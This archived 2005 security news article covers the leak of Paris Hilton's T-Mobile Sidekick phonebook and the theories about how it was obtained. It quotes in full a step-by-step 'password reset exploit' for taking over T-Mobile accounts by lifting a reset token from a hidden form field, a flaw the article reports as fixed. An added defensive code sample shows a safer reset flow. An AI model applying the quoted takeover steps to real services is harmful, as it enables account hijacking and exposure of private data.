Rootsecure.net
The Security News Site For Systems Administrators & Hackers Thursday, 2nd October 2014 @ 13:25:38 GMT 
Reports | Paris Hilton's phonebook hacked, posted online (+ how it could have been done)
{21st Feb 2005}
T-Mobile was yesterday involved in yet another high profile compromise of customer data.

It comes within a week of Nicholas Jacobsen, 22, pleading guilty in the United States Los Angeles District Court to his unauthorised access of the T-Mobile system from October 2003, which involved various Hollywood celebrities and a Secret Service agent; however, the data was not made widely publicly available.

The phone book, email addresses, and notes from celebrity Paris Hilton's T-Mobile Sidekick were posted on the web and rapidly circulated by various online news websites / blogs including Engadget and Gizmodo, with perhaps a questionable disregard for the privacy of Paris Hilton herself and everyone in her address book, who will likely be forced to change their phone numbers / email addresses as a result (the address book contained 510 entries including Lindsay Lohan, Avril Lavigne and Christina Aguilera). Soon after, the original site ran out of bandwidth. Fans quickly set up mirrors, but shortly after they too started falling like flies, shut down by service providers or taken offline due to the high volume of traffic they were receiving.

The Sidekick II stores all its information on T-Mobile's servers (rather than the usual practice of storing it on the phone itself), and it was through the web interface to this service that the data was exposed. Various theories have been popping up around the web as to how it occurred: a smooth-talking social engineer (according to F-Secure the text "The previous information was obtained using social engineering tactics" appeared on the original mirror), or someone related to Nicholas Jacobsen who had access to the information the first time round. The second is unlikely, since the address book as leaked, in the form of HTML web pages, bore the date February 19th 2005. There is also a third possibility: that another intruder independently accessed the T-Mobile site using a vulnerability still in existence on the T-Mobile website, the possibility of which was widely reported just 2 days prior.

In a bizarre twist to the story, the celebrity's Sidekick notes contained the K7 voicemail box of renowned phreaker (phone hacker) / 2600 Magazine writer Lucky225, who in a gesture of good faith previously informed her about the insecurities of the T-Mobile voicemail system (it is possible to spoof caller ID and access an individual's messages as if you had their phone, i.e. without a password if you have none set, according to an advisory posted on Full Disclosure from Secure Science Corporation). Once the phone book became public, the phreaker even changed his own voicemail greeting in anticipation of those who would call after seeing it online.

"Yes, I left her a message back in October a couple days before the Security Focus article on T-Mobile voicemail vulnerability came out. I tried to warn her voicemail was insecure."

After being contacted for comment, Lucky225 pointed Rootsecure.net to a zip file on illmob.org containing what appears to be a T-Mobile account scanner / exploiter utility and a text file labelled "Tmobile Acct. PW Reset Exploit" with step-by-step instructions for resetting any T-Mobile user's password (due to lack of a Sidekick it was not possible to verify them either way):

Tmobile Acct. PW Reset Exploit
-Authors: Team Screen Name
-Found: 3/20/2004
-Released: N/A

-Introduction

This exploit is quite simple, you can gain access to anyone's tmobile account via their website, tmobile.com, which could be used to get account information or even view calls that the person received or transmitted.

-Details on the discovery of this exploit

The discovery of this exploit was quite simple, while viewing the few links on tmobile site which deal with account help, checking out the html and the data transmitted with each link, we discovered that this was quite a simple exploit to achieve.

-Procedure

Visit http://sidekick.t-mobile.com/pocketpc/forgot_pswd.asp?Source=PDA_VS
Leave the username blank.
Type in the phone # you wish to takeover.
Submit this form.

On the ASQ page view source.
Search for "token".
IE: <input type="hidden" name="token" value="KLJfkjlBERToEHRIHWOR73t&BWERKJ@^*$7WORUt79@$">
Extract the token value from this line (remove the <input type="hidden" name="token" value=" and the "> at the end)
Save this token in your clipboard because you will need it.

Visit https://wipcore.t-mobile.com/pdaPassUpdate.jsp?token=THETOKENYOUSAVED
Input the token in the string above.
Reset the password and the ASQ.

Log in via Tmobile.com

Have a nice day ;)

[Tmobile Exploit.txt]


Lucky225 stated that, according to information he received, the illmob exploit is a year old and has been fixed (according to the website it was posted in the "0 day" section on October 19th 2004).
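
The weakness in the quoted procedure is that the security-question (ASQ) page already carries a usable reset token in a hidden field, and the update page accepts that token on its own. As an added example (not from the original article and not T-Mobile's code; the class, field names, token lifetime and phone numbers are assumptions), a reset flow that issues the token only after the answer verifies and binds it to one account, one use and a short lifetime:

```python
import hashlib, hmac, os, secrets, time

TOKEN_TTL = 600  # seconds a reset token stays valid (assumed policy)

def kdf(secret, salt):
    # Slow hash for low-entropy secrets (answers, passwords).
    return hashlib.pbkdf2_hmac("sha256", secret.encode(), salt, 100_000)

def make_account(answer, password):
    # Constructed sample record; field names are hypothetical.
    salt = os.urandom(16)
    return {"salt": salt, "asq": kdf(answer, salt), "pw": kdf(password, salt)}

class ResetService:
    def __init__(self, accounts, now=time.time):
        self.accounts = accounts   # phone number -> account record
        self.tokens = {}           # sha256(token) -> (phone, expiry)
        self.now = now

    def challenge_page(self, phone):
        # Step 1: the secret-question page carries no credential at all.
        # The flaw described above was a usable token in a hidden field here.
        return {"phone": phone, "fields": ["answer"]}

    def answer_challenge(self, phone, answer):
        # Step 2: a token is minted only after the answer verifies.
        acct = self.accounts.get(phone)
        if acct is None or not hmac.compare_digest(
                kdf(answer, acct["salt"]), acct["asq"]):
            return None
        token = secrets.token_urlsafe(32)
        key = hashlib.sha256(token.encode()).hexdigest()
        self.tokens[key] = (phone, self.now() + TOKEN_TTL)
        return token

    def update_password(self, phone, token, new_password):
        # Step 3: the token is single-use, unexpired and bound to one account.
        key = hashlib.sha256(token.encode()).hexdigest()
        entry = self.tokens.pop(key, None)
        if entry is None or entry[0] != phone or self.now() > entry[1]:
            return False
        acct = self.accounts[phone]
        acct["pw"] = kdf(new_password, acct["salt"])
        return True
```

Only a digest of each token is stored server-side, so a leak of the token table does not yield working reset links.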

In an age of growing technological advancement with more and more data being collected and stored on every citizen in massive centrally accessible databases, both consumers and businesses must weigh the risks against the benefits and act responsibly.